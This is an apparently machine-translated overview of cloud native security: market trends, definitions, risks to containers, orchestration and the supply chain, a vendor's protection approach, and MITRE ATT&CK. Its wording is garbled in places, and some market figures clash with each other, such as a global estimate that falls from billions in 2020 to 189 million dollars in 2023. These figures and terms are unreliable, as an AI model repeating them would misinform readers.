Cloud computing is the concentrated expression of information technology development and service model innovation, and it is an important change and inevitable trend of information development. With the accelerated layout of "new infrastructure" and the gradual deepening of enterprise digital transformation, how to deepen the use of cloud and further improve the efficiency of cloud computing has become the focus of cloud computing development at this stage. Cloud native technology, with its efficient, stable and fast response, has greatly released the efficiency of cloud computing and become the driving force of enterprise digital business application innovation. Cloud native technology has entered a stage of rapid development. Just as containers accelerate the process of trade globalization, cloud native technology is helping the popularization of cloud computing and the digital transformation of enterprises.

Cloud Native Computing Foundation (CNCF) defines cloud native technology as: cloud native technology is beneficial for organizations to build and run flexible and scalable applications in new dynamic environments such as public cloud, private cloud and hybrid cloud. The representative technologies of cloud nativity include container, service grid, microservice, immutable infrastructure and declarative programming API.

# Market development in the era of cloud security #

Cloud security has almost developed with the cloud computing market. The rapid growth of cloud infrastructure investment undoubtedly provides the soil for the development of cloud security. According to IDC data, the proportion of global cloud security expenditure to cloud IT expenditure in 2020 is only 1. 1%, which shows that the current cloud security expenditure is far from enough. Assuming this ratio is increased to 5%, the global market space for cloud security will reach 5.32 billion US dollars in 2020 and189 million US dollars in 2023.

Overseas cloud security market: technological innovation and M&A integration are active. On the whole, the overseas cloud security market is in a stage of rapid development, with active technological innovation and frequent mergers and acquisitions. On the one hand, the innovation of cloud security technology is active and shows a convergence trend. For example, the Prisma product line of PaloAlto, a comprehensive security company, unifies three cloud security technology products: CWPP, CSPM and CASB, providing comprehensive solutions and a series of cloud security capabilities such as SASE, container security and micro-isolation. On the other hand, emerging cloud security enterprises are developing rapidly. At the same time, traditional security providers also strengthen the cloud security layout through self-research and mergers.

Domestic cloud security market: the market space is vast, and it is still in the stage of technical follow-up. In terms of market size, according to the data of China ICT Institute, the overall market size of cloud computing in China reached1334.5 billion yuan in 20 19, with a growth rate of 38.6%. It is estimated that it will still be in the stage of rapid growth from 2020 to 2022, and the market scale will exceed 375.42 billion yuan by 2023. Under the neutral assumption, security investment accounts for 3%-5% of the cloud computing market, so it is estimated that the scale of China's cloud security market will reach1126 billion-187.7 billion yuan in 2023. In terms of technology development, there is still a certain gap between China and overseas markets in the development stage of cloud computing and the degree of cloud native technology. CWPP technology is widely used in China, but it is seldom used for some emerging cloud security technologies such as CASB and CSPM. However, with the accelerated development of domestic public cloud market, the application of cloud native technology is more and more extensive, and we think that emerging technologies such as CASB, SCPM and SASE will be more and more widely used in China.

# Cloud security shows original biochemical development trend #

Cloud native technology has gradually become a new trend in the cloud computing market, which has brought more complex security issues. Cloud native technologies such as containers, service grids and micro-services are affecting IT infrastructure, platforms and application systems in all walks of life, and are also infiltrating into new infrastructure such as IT/OT integrated industrial Internet, IT/CT integrated 5G and edge computing. With more and more applications of cloud nativity, its related security risks and threats are constantly emerging. A series of security attacks against the cloud emerge one after another, such as the exposure of services such as Docker/Kubernetes, the mining event of Tesla Kubernetes cluster, the container image in Docker Hub being "poisoned" into the mining program, the large-scale Kubernetes mining event detected by Microsoft Azure Security Center, and the communication event of Graboid worm mining.

From all kinds of security risks, we can get a glimpse of the security situation of cloud native technology, and there are still many security problems to be solved urgently in the cloud native environment. In the process of cloud native technology landing, security is an important factor that must be considered.

# Definition of cloud native security #

Organizations and enterprises at home and abroad have slightly different interpretations of the concept of cloud native security. Combined with the industrial status and pain points in China, cloud native security is similar to cloud computing security, and it also includes two meanings: "security for cloud native environment" and "security with cloud native characteristics".

Facing the security of cloud native environment, its goal is to protect the security of infrastructure, orchestration system and microservices in cloud native environment. These security mechanisms do not necessarily have the native characteristics of the cloud (such as containerization and programmability). They can be deployed in traditional modes or even hardware devices, but their role is to protect the increasingly popular cloud native environment.

Cloud native security refers to various security mechanisms with cloud native characteristics such as flexibility, agility, lightweight and programmability. Cloud nativity is a kind of conceptual innovation, which reconstructs the traditional development and operation system through containerization, resource arrangement and micro-service, and accelerates the speed of business online and change. Therefore, the excellent characteristics of cloud native system will also bring great inspiration to security vendors, reconstruct security products and platforms, and change their delivery and update modes.

# Cloud Native Security Concept Construction #

In order to alleviate the pain points in traditional security protection construction, promote cloud computing to become a more secure and credible information infrastructure, and help cloud customers use cloud computing more safely, the concept of cloud native security has emerged, and third-party organizations and service providers at home and abroad have proposed to build and develop cloud security with native as the core.

Gartner advocates building a cloud security system with cloud native thinking.

Based on cloud native thinking, the cloud security system proposed by Gartner covers eight aspects. Among them, infrastructure configuration, identity and access management are provided by cloud service providers as basic capabilities, and the other six parts, including continuous cloud security situation management, all-round visualization, logging, audit and evaluation, workload security, application, PaaS and API security, extended data protection and cloud threat detection, need to be implemented by customers based on security products.

Forrester evaluates the native security capabilities of public cloud platforms.

Forrester thinks that PCPNS of public cloud platforms should be measured from three categories and 37 aspects. From the products and functions provided, as well as the future strategic planning, we can see that the first is to investigate the security capabilities and construction of cloud service providers, such as data center security and internal personnel; The other is the basic security functions of the cloud platform, such as help and documentation, authorization and authentication; The third is the native security products provided for users, such as container security and data security.

Security dogs build cloud native security through four work protection systems.

(1) Carry out and implement the minimum authority and defense-in-depth work in combination with the specific landing situation of cloud native technology. For various components in the cloud native environment, the principle of "safely moving to the left" can be implemented, and the security baseline can be configured to prevent problems before they happen. For the protection of micro-service architecture Web applications and serverless applications, the focus is on application security.

(2) DevSecOps focuses on the life cycle of cloud native applications, and takes the key technology stack "K8S+Docker" in the current cloud native environment as an example for analysis. We should pay attention to the three elements of container life cycle: configuration security, mirror security of project construction, container access of project deployment, and cloud computing, network and storage of container operation environment.

(3) The security implementation criteria before, during and after the attack are constructed, and the detection and defense work can be carried out in these three stages according to the security implementation criteria.

(4) The transformation and comprehensive application of existing cloud security technologies should not take "cloud native security" as an independent proposition, but technologies that provide more support for cloud native environment such as host security and micro-isolation can empower cloud native security.

# New Risks of Cloud Native Security #

The security risks of cloud native architecture include the security risks of cloud native infrastructure itself and the new and expanded security risks after the upper application of cloud native biochemical transformation. Cloud native environment is facing severe security risks. Important attack surfaces that attackers may use include but are not limited to: container security, orchestration system, software supply chain, etc. The following are the important security risks of sorting out the attack surface.

# Cloud Native Security Issues #

Question 1: Container safety problem

In the process of building a cloud native application and service platform, container technology has become an important technical support in cloud native application scenarios with its high flexibility and agility, so container security is also an important cornerstone of cloud native security.

(1) The container image is unsafe.

Sysdig's report mentioned that in users' production environment, open mirror warehouses will be used as software sources, such as Docker Hub, the largest container mirror warehouse. On the one hand, many open source software will publish container images on Docker Hub. On the other hand, developers usually download container images in open libraries directly or customize their own images based on these basic images. The whole process is very convenient and efficient. However, the picture security on Docker Hub is not ideal, and there are a lot of official pictures of high-risk vulnerabilities. If you use these images with high-risk vulnerabilities, the invasion risk of containers and hosts will increase greatly. At present, the security problems of container images mainly include the following three points:

1. Unsafe third-party components

In the actual process of containerized application development, it is rare to build an image from scratch, but to add your own programs and codes to the basic image, and then package the final business image and run it online, which leads many developers to have no idea how many components are included in the basic image. The more components you include, the more vulnerabilities you may have.

2. Malicious mirroring

There may be malicious images uploaded by a third party in the public image warehouse. If these malicious images are used to create containers, the security of containers and applications will be affected.

3. Leakage of sensitive information

In order to facilitate development and debugging, developers store sensitive information in configuration files, such as database passwords, certificates and keys. When building a mirror, these sensitive information will be packaged into the mirror together with the configuration file, which will lead to the leakage of sensitive information.

(2) The life cycle of the container is short.

Cloud native technology leads the business development of enterprises with its agile and reliable characteristics, and becomes the driving force of enterprise digital business application innovation. In the container environment, some containers are started and managed by docker's command, and a large number of containers are started and managed by Kubernetes container scheduling system, which brings the characteristics of rapid and agile construction, deployment and operation of containers. The life cycle of a large number of containers is shorter than 1 hour, which greatly changes the life cycle protection of containers compared with the traditional virtualization environment, and there are great variables in the whole life cycle protection of containers. For the defense side, it is necessary to adopt the combination of traditional anomaly detection and behavior analysis to adapt to the short life cycle of the container.

Traditional anomaly detection uses WAF, IDS and other devices, and its rule base is already perfect. Through this detection method, the existing threats can be displayed intuitively, and this method is still applicable in the container environment.

Traditional anomaly detection can find known threats quickly and accurately, but most unknown threats can't be matched by rule base, so it is necessary to analyze abnormal patterns from a large number of patterns through behavior analysis mechanism. Generally speaking, the business model of a production and operation period is relatively fixed, that is to say, the business behavior is predictable. No matter how many containers are started, the behavior inside the containers is always similar. Through machine learning and collecting process behaviors, reasonable baselines are automatically constructed, and these baselines are used to detect unknown threats in containers.

(3) Safe operation of containers

While container technology brings convenience, it often ignores the safety reinforcement of containers during operation. Due to the short life cycle and light weight of containers, it is time-consuming and resource-consuming to install anti-virus software on the host or virtual machine to protect a container running one or two processes, but in the eyes of hackers, containers are tantamount to streaking. Main concerns of container runtime security:

1. Unsafe container application

Similar to the traditional Web security, there are some vulnerabilities in the container environment, such as SQL injection, XSS, RCE and XE. While providing services to the outside world, the container may be exploited by attackers, resulting in the container being invaded.

2. Container DDOS attack

By default, docker does not restrict the use of container resources. By default, it can use CPU, memory and hard disk resources indefinitely, causing different degrees of DDOS attacks.

(4) container micro-isolation

In the container environment, compared with the traditional network, the life cycle of the container becomes shorter and the frequency of change is faster. There is a complex access relationship between containers, especially when the number of containers reaches a certain scale, the east-west traffic brought by this access relationship will become extremely large and complicated. Therefore, in the container environment, the isolation requirement of the network is not only the isolation of the physical network, but also the isolation between containers, between container groups and hosts, and between hosts.

Question 2: Compliance of cloud native insurance.

Level 2.0 puts forward security expansion requirements to meet the personalized security protection requirements of new technologies and new application fields such as cloud computing, and forms a new basic requirement standard for network security level protection. Although the security expansion requirements of cloud computing have been written, due to the long writing cycle, virtualization scenarios are still the mainstream at the time of writing, and cloud native scenarios such as containerization, microservice and no service are not considered, so all standards in Level Protection 2.0 cannot be fully guaranteed to be applicable to the current cloud native environment;

Through the experience and concrete practice of security dog in the field of cloud security, it is necessary to detect the security of host account, set the access rights of different accounts to different containers, and ensure that the access control policy will migrate with the containers in the process of construction, deployment and operation.

For the control points of intrusion prevention system, it is necessary to visually manage, draw business topology diagram, prevent host intrusion in all directions, control business traffic access, and detect the infection and spread of malicious code;

For the control of mirror image and snapshot protection, it is necessary to protect mirror image and snapshot, ensure the integrity, availability and confidentiality of container mirror image, and prevent sensitive information from leaking.

Question 3: Host security

The container and the host * * * share the operating system kernel, so the configuration of the host has an important impact on the security of the container. For example, the installation of vulnerable software by the host may lead to the risk of arbitrary code execution, and the unrestricted opening of the port may lead to the risk of arbitrary user access. Through the deployment of host intrusion monitoring and security protection system, it provides host asset management, host security reinforcement, risk vulnerability identification, intrusion prevention, problem host isolation and other functions, which are linked together to establish a security closed-loop management system integrating collection, detection, monitoring, defense and capture, providing all-round security protection for hosts, helping users to locate the falling hosts in time, coping with known and unknown threats and risks, and avoiding the occurrence of large-scale internal host security incidents.

Question 4: Arrangement system.

Orchestration system supports many cloud native applications, such as no service, service grid and so on. These new micro-service systems also have security problems. For example, an attacker writes a piece of code to obtain the shell permission of the container, and then penetrates the container network, causing huge losses.

Due to the complexity of Kubernetes architecture design, starting a Pod resource needs to involve API server, controller, manager, scheduler and other components, so the security capability of each component is particularly important. Authentication, authorization, access control provided by API server components, fine-grained access control, key management provided by secret resources, and security and network policies provided by Pod itself can effectively realize the security reinforcement of Kubernetes.

Question 5: Security of software supply chain

Usually, a large number of open source software will be used in a project. According to Gartner, at least 95% of enterprises will use open source software in key IT products. These open source software from the Internet may have viruses themselves, and we don't know which components are used in these open source software, which leads to the existence of 0-day or Nday vulnerabilities in open source software, and we simply don't know.

The vulnerability of open source software cannot be cured, and the security problem of the container itself may bring risks to all processes in the development stage. What we can do is to evaluate and control the software security reasonably from the development stage according to SDL principle, so as to improve the quality of the whole supply chain.

Question 6: The cost of safe operation

Although the life cycle of a container is short, it is all-encompassing. In the whole life cycle protection of containers, abnormal detection and safety protection will be carried out during the construction, deployment and operation of containers, which is followed by high-cost investment. Process detection and analysis of process behavior in thousands of containers will consume host processor and memory resources, log transmission will occupy network bandwidth, and behavior detection will consume computing resources. When the number of containers in the environment is huge, the corresponding safe operation cost will increase sharply.

Question 7: How to improve the safety protection effect?

On the issue of safe operation cost, we know that the safe operation cost of containers is very high. How can we reduce the cost of safe operation and improve the safety protection effect? This introduces a popular word in the industry, "safely moving to the left", which extends the software life cycle from left to right, that is, development, testing, integration, deployment and operation. The meaning of security moving to the left is to transfer the security protection from the traditional operation end to the development end, mainly designing and developing software, software supply chain security and mirror security.

Therefore, in order to reduce the safe operation cost and improve the operation efficiency in the cloud native scenario, we must first "move to the left", that is, from the operation security to the development security, mainly considering the development security, software supply chain security, mirror security and configuration verification:

Development safety

Teams need to pay attention to code vulnerabilities, such as using to conduct code audits, discovering vulnerabilities caused by lack of security awareness, and code logic vulnerabilities caused by logic problems.

Supply chain security

Code checking tools can be used for continuous security assessment.

Mirror security

Use the mirror vulnerability scanning tool to continuously evaluate the images in the free warehouse and update the risky images in time.

Configuration check

Verification includes exposure, host reinforcement, asset management, etc. , making it more difficult for attackers to exploit vulnerabilities.

Question 8: Security configuration and key certificate management.

Non-standard security configuration and unsatisfactory key credentials are also a major risk point of cloud locality. There will be many interactions between cloud native applications, middleware and back-end services. For the sake of simplicity, many developers directly store access credentials and key files in the code, or set the access credentials of some online resources as weak passwords, which makes it easy for attackers to gain access to sensitive data.

# Cloud Native Security Future Outlook #

Judging from the increasing new attack threats, cloud native security will become the key to future network security protection. With the continuous accumulation of CK and the improvement of related technologies, att&; CK also adds the contents of the container matrix. ATT & amp； CK is the abbreviation of opponent's tactics, skills and common sense. It is an attack behavior knowledge base and threat modeling model, which contains many threat organizations and their tools and attack technologies. This open source knowledge base of countermeasure strategy and technology has a wide and far-reaching impact on the security industry.

The concern about cloud native security makes the attack matrix against cloud containers emerge as the times require. ATT & amp； CK allows us to look at attackers and defensive measures from the perspective of behavior, so that relatively abstract container attack techniques and tools can be traced. Combining the att&CK framework to simulate the red-blue confrontation and evaluate the current security capability of enterprises is of great reference for improving the security protection capability of enterprises.